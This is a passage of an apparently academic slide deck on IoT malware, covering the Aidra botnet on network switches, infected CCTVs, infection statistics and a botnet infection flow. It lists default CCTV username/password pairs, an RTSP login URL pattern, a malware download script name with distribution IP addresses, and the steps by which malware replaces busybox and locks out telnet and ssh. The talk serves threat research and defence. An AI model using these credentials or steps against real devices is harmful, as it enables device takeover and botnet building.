  • 21. 21 Case 2. Network Switch Basic group Aidra group configure spoof (ip spoofing) advscan (after scan on B Class, check id/pass or access telnet to infect to device ) Attack running Version check Run attack script include update malware) /var/run/getbinaries.sh mips_aidra superh_aidra arm_aidra ppc_aidra </var/run/getbinaries.sh > 76.73.104.50 46.40.191.171 <OOO_aidra> 217.23.10.250
  • 22. 22 Case 3. CCTV • Trace source IP address of DDoS attack and find out a management page of CCTV
  • 23. 23 Case 3. CCTV • Malwares on CCTV - password is changed - update with infected firmware (get root permission) • rtsp://<CCTV IP>/trackID=1&basic_auth=base64([id:pw]) - root / (empty) - root / root - root / admin - admin / admin - admin / 1234 - admin / 12345 - admin / smcadmin - admin / (empty)
  • 24. 24 Case 3. CCTV • Scanning 120,000,000 IP over the internet with the tool and found 23,507 CCTV IP • Vulnerable CCTVs are 9,063 among them • Default id, password are commonly used
  • 25. 25 A mount of infected device • Approximately 2,000,000,000 of IP Home router, 1,151,940 Network Switch, 19,754 CCTV, 23,507 STB, 2 others, 4,349 (0.36%) (96.03%) (1.65%) (1.95%) (0.00%)
  • 26. 26 Infection flow of IoT Attacker or infected IoT device IoT device (Victim) ① IP range scan ② access to victim’s IP through telnet or web ③ attack with default (ID, password) or remote command execution ④ upload malicious code ① delete temp files and directories ② kill main services(telnet, main daemon and…) ③ download & overwrite infected busybox from C&C server ④ delete the downloaded file at ③ ⑤ overwrite infected busybox to main daemon ⑥ delete the infected busybox at ⑤ ⑦ execute main deamon ⑧ block and kill telnet, ssh using iptables for protecting itself External infection flow Internal infection flow
  • 27. 27 Conclusion • The Internet of Things(IoT) is beginning to grow significantly. • IoT devices have many vulnerabilities. • All devices can be zombie devices. • We need more active defenses.
  • 28. 28 Future works • Automatic vulnerabilities scanner for IoT
  • 29. 29 Future works • Automatic vulnerabilities scanner for IoT
  • 30. 30 Future works • Automatic vulnerabilities scanner for IoT
  • 31. 31 E-Mail : zizihacker@korea.ac.kr, zizihacker@gmail.com Thanks for your attention. Questions ?